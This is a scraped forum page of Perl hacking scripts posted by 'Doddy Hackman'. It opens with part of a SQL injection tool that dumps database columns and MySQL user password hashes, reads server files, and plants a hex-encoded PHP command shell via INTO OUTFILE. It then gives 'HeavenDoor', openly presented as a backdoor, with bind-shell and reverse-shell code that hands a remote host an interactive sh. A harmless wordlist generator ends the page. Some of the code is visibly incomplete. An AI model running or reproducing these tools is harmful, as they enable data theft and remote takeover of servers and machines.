toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; } } } else { print "\n[-] information_schema = ERROR\n"; } } sub mysqluser { my ($page,$bypass,$save) = @_; my $cop = $page; my $cop1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Finding mysql.users\n"; ($pass1,$pass2) = &bypass($bypass); $page =~s/hackman /concat (char (82,65,84,83,88,80,68,79,87,78,49))/; $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2); if ($code=~/RATSXPDOWN/ig){ $cop1 =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2); if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n\n[+] Users Found : $1\n\n"; savefile($save.".txt","\n[+] Users mysql Found : $1\n"); for my $limit(0..$1) { $cop =~s/hackman /unhex (hex(concat (0x524154535850444f574e ,Host ,0x524154535850444f574e ,User ,0x524154535850444f574e ,Password ,0x524154535850444f574e )))/; $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) { print "[Host] : $1 [User] : $2 [Password] : $3\n"; savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3"); } else { &reload; } } } } else { print "\n[-] mysql.user = ERROR\n"; } } sub tabfuzz { my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $count = "0"; savefile($_[2].".txt","\n"); if ($_[0] =~/(.*)hackman(.*)/g) { my $start = $1; my $end = $2; print "\n\n[+] Searching tables.....\n\n"; for my $table(@buscar2) { $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2; $code = toma($injection); if ($code =~/ERTOR854/g) { $count++; print "[Table Found] : $table\n"; savefile($_[2].".txt","[Table Found] : $table"); }}} if ($count eq "0") { print "[-] Not found any table\n"; &reload; } } sub colfuzz { my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $count = "0"; savefile($_[3].".txt","\n"); if ($_[0] =~/(.*)hackman(.*)/) { my $start = $1; my $end = $2; print "[+] Searching columns for the table $_[2]...\n\n"; savefile($_[3].".txt","[Table] : $_[2]"); for my $columns(@buscar1) { $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))"; $code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2); if ($code =~/ERTOR854/g) { print "[Column] : $columns\n"; savefile($_[3].".txt","[Column Found] : $columns"); } } } else { print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; ©right; } } sub load { savefile($_[2].".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); if ($_[0] =~/(.*)hackman(.*)/g) { print "\n[+] Searching files with load_file...\n\n\n"; my $start = $1; my $end = $2; for my $file(@files) { $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))"; my $code = toma($start.$concat.$end.$pass2); if ($code=~/k0bra (.*)k0bra /s) { print "[File Found] : $file\n"; print "\n[Source Start]\n\n"; print "\n\n[Source End]\n\n"; savefile($_[2].".txt","[File Found] : $file"); savefile($_[2].".txt","\n[Source Start]\n"); savefile($_[2].".txt","$1"); savefile($_[2].".txt","\n[Source End]\n"); }}}} sub loadfile { savefile($_[2].".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); if ($_[0] =~/(.*)hackman(.*)/g) { my $start = $1; my $end = $2; print "\n\n[+] File to read : "; chomp (my $file = <stdin>); $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))"; my $code = toma($start.$concat.$end.$pass2); if ($code=~/k0bra (.*)k0bra /s) { print "[File Found] : $file\n"; print "\n[Source Start]\n\n"; print "\n\n[Source End]\n\n"; savefile($_[2].".txt","[File Found] : $file"); savefile($_[2].".txt","\n[Source Start]\n"); savefile($_[2].".txt","$1"); savefile($_[2].".txt","\n[Source End]\n"); }}} savefile($_[5].".txt","\n"); my $page = $_[0]; ($pass1,$pass2) = &bypass($_[4]); if ($page=~/(.*)hackman(.*)/){ my $start = $1; my $end = $2; print "[+] Extracting values...\n\n"; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2); $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; if ($val_code=~/ERTOR854(.*)ERTOR854/ig) { $tota = $1; print "[+] Table : $_[3]\n"; print "[+] Length of the rows : $tota\n\n"; print "[$_[1]] [$_[2]]\n\n"; savefile($_[5].".txt","[Table] : $_[3]"); savefile($_[5].".txt","[+] Length of the rows: $tota\n"); savefile($_[5].".txt","[$_[1]] [$_[2]]\n"); for my $limit(0..$tota) { $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2); if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) { savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2"); print "[$_[1]] : $1 [$_[2]] : $2\n"; } else { print "\n\n[+] Extracting Finish\n"; &reload; } } } else { print "[-] Not Found any DATA\n\n"; }}} sub into { print "\n\n[Status] : Injecting a SQLI for create a shell\n\n"; my ($page,$bypass,$dir,$save) = @_; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $path1 = $1; my $path2 = $path1; $shell = $dir."/"."shell.php"; if ($page =~/(.*)hackman(.*)/ig) { my ($start,$end) = ($1,$2); $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2); $code1 = toma("http://".$auth."/".$path2."/"."shell.php"); if ($code1=~/Mini Shell By Doddy/ig) { print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a"; savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php"); } else { print "[shell] : Not Found\n"; } } } } sub encode { my $string = $_[0]; $hex = '0x'; } } sub decode { $_[0] =~ s/^0x//; } sub bypass { if ($_[0] eq "/*") { return ("/**/","/**/"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } sub ascii { } sub ascii_de { } sub finish { ©right; <STDIN>; } sub installer { unless (-d "/logs/webs") { } } sub copyright { print "\n\n\n\n(C) Doddy Hackman 2010\n\n"; } sub toma { return $nave->get($_[0])->content; } sub savefile { open (SAVE ,">>logs/webs/".$_[0]); } sub finish { print "\n\n\n(C) Doddy Hackman 2010\n\n"; <STDIN>; } # The End ?
|
|
|
|
|
439
|
Programación / Scripting / [Perl] HeavenDoor 0.5
|
en: 1 Diciembre 2011, 22:13 pm
|
La nueva version de este backdoor que hice hace tiempo #!usr/bin/perl #HeavenDoor 0.5 #By Doddy H use IO::Socket; use Cwd; if ($ARGV[0] eq "-reverse") { if ($ARGV[1] =~/(.*):(.*)/) { my $ip = $1; my $port = $2; conectar($ip,$port); tipo(); } } elsif ($ARGV[0] eq "-backdoor") { listar($ARGV[1]); } else { print "\n[+] Examples : $0 -backdoor 666 / -reverse localhost:666\n"; } sub listar { $backdoor = IO::Socket::INET->new( Proto => 'tcp', LocalPort => $_[0], Listen => SOMAXC, Reuse => 1); print "[*] Heaven_Door Online\n[*] Port : $_[0]\n[*] PID : ".$$."\n\n"; while ($jesus = $backdoor->accept()) { $jesus->autoflush(1); print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n"; print $jesus "Welcome ".$jesus->peerhost."\n\n"; &extras; $dir = getcwd(); while (<$jesus>) { print $jesus "\n\n".$yeah."\n\n"; } } sub extras { if ($^O =~//ig) { use Win32; print $jesus "[+] Domain Name : ".Win32 ::DomainName()."\n"; print $jesus "[+] OS Version : ".Win32 ::GetOSName()."\n"; print $jesus "[+] Username : ".Win32 ::LoginName()."\n\n\n"; } else { print $jesus "--==System Info==--\n\n".$s; } } } sub conectar { connect(REVERSE , sockaddr_in ($_[1],inet_aton ($_[0]))); open (STDIN,">&REVERSE"); open (STDOUT,">&REVERSE"); open (STDERR,">&REVERSE"); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ($^O =~/Win32/ig) { infowin(); } else { infolinux(); system("export TERM=xterm;exec sh -i"); } } sub infowin { use Win32; print "[+] Domain Name : ".Win32 ::DomainName()."\n"; print "[+] OS Version : ".Win32 ::GetOSName()."\n"; print "[+] Username : ".Win32 ::LoginName()."\n\n\n"; } sub infolinux { print "[+] System information\n\n"; } #The End ?
Esta nueva version surgio de la mezcla de estos dos codigos que habia hecho heaven_door.pl #!usr/bin/perl #Heaven_Door is a backdoor in Perl #Coded By Doddy Hackman use IO::Socket::INET; use Net::hostent; use Cwd; use Win32; $backdoor = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '25256', Listen => SOMAXC, Reuse => 1); print "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n"; while ($jesus = $backdoor->accept()) { $jesus->autoflush(1); print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n"; print $jesus "Welcome ".$jesus->peerhost."\n\n"; &extras; $dir = getcwd(); while (<$jesus>) { print $jesus "\n\n".$yeah."\n\n"; } } sub extras { if ($^O =~//ig) { print $jesus "[+] Domain Name : ".Win32 ::DomainName()."\n"; print $jesus "[+] OS Version : ".Win32 ::GetOSName()."\n"; print $jesus "[+] Username : ".Win32 ::LoginName()."\n\n\n"; } else { print $jesus "--==System Info==--\n\n".$s; } }
reverse_shell.pl #!usr/bin/perl #Reverse Shell 0.1 #By Doddy H use IO::Socket; print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n"; unless (@ARGV == 2) { print "[Sintax] : $0 <host> <port>\n\n"; } else { print "[+] Starting the connection\n"; print "[+] Enter in the system\n"; print "[+] Enjoy !!!\n\n"; conectar($ARGV[0],$ARGV[1]); tipo(); } sub conectar { connect(REVERSE , sockaddr_in ($_[1],inet_aton ($_[0]))); open (STDIN,">&REVERSE"); open (STDOUT,">&REVERSE"); open (STDERR,">&REVERSE"); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ($^O =~/Win32/ig) { infowin(); } else { infolinux(); #root(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : ".Win32 ::DomainName()."\n"; print "[+] OS Version : ".Win32 ::GetOSName()."\n"; print "[+] Username : ".Win32 ::LoginName()."\n\n\n"; } sub infolinux { print "[+] System information\n\n"; } #The End
|
|
|
|
|
440
|
Programación / Scripting / [Perl] GenWordlist 0.2
|
en: 1 Diciembre 2011, 22:12 pm
|
Simple programa en perl para generar diccionarios #!usr/bin/perl #Gen Wordlist 0.2 #By Doddy H #ppm install http://www.bribes.org/perl/ppm/HTML-Strip.ppd use LWP::UserAgent; use HTML::Strip; my $nave = LWP::UserAgent->new(); $nave->timeout(5); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); head(); unless($ARGV[0]) { sintax(); } else { start($ARGV[0]); } copyright(); sub start { print "\n[+] Getting source code of the page\n"; my @contenido = toma($_[0]); my $uno = HTML::Strip->new(emit_spaces => 1); for my $tengo(@contenido) { my @parteuno = $uno->parse($tengo); push(@palabras,@parteuno); } for(@palabras) { } my @final = repes(@palabrasx); print "\n[+] Words Found : ".int(@final)."\n\n"; for my $aca(@final) { print "[+] Word : $aca\n"; } } sub sintax { print "\n[+] sintax : $0 <web>\n"; } sub head { print "\n\n-- == Gen Wordlist == --\n\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } } sub toma { return $nave->get( $_[0] )->content; } # The End ?
|
|
|
|
|
|
| |
|
Mostrar Mensajes